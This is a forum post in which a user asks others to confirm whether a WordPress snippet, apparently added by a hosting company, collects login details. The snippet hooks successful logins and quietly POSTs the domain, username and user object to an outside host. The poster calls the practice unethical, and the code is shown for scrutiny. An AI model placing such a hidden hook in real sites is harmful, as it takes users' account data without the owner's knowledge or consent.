Please Confirm that this WordPress Code Captures Login Names and Passwords
Anyone willing to confirm that this is in fact what the following snippets do? I find this extremely unethical and totally unacceptable from a hosting company. Do you agree?
############################################# add_action('wp_login', 'bh_track_successful_login'); function bh_track_successful_login($user_login, $user) { $params = array( 'domain' => $_SERVER['HTTP_HOST'], 'user_login' => $user_login, 'user' => $user ); $resp = _curl_post('http://setup.brainhost.com/track_login', $params); return; } function _curl_post($url=false,$post=array()) { // error handling if ( ! $url) return; // generate query string from post_data $query_string = http_build_query($post); // initialize curl $ch = curl_init(); // set parameters curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $query_string); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // run cUrl $response = curl_exec ($ch); // return the response return $response; }
Robin
Robin
The 2nd Amendment, 1789 - The Original Homeland Security.
Gun control means never having to say, "I missed you."
Generate thousands of leads in any niche in under 60 seconds!
The 2nd Amendment, 1789 - The Original Homeland Security.
Gun control means never having to say, "I missed you."
Generate thousands of leads in any niche in under 60 seconds!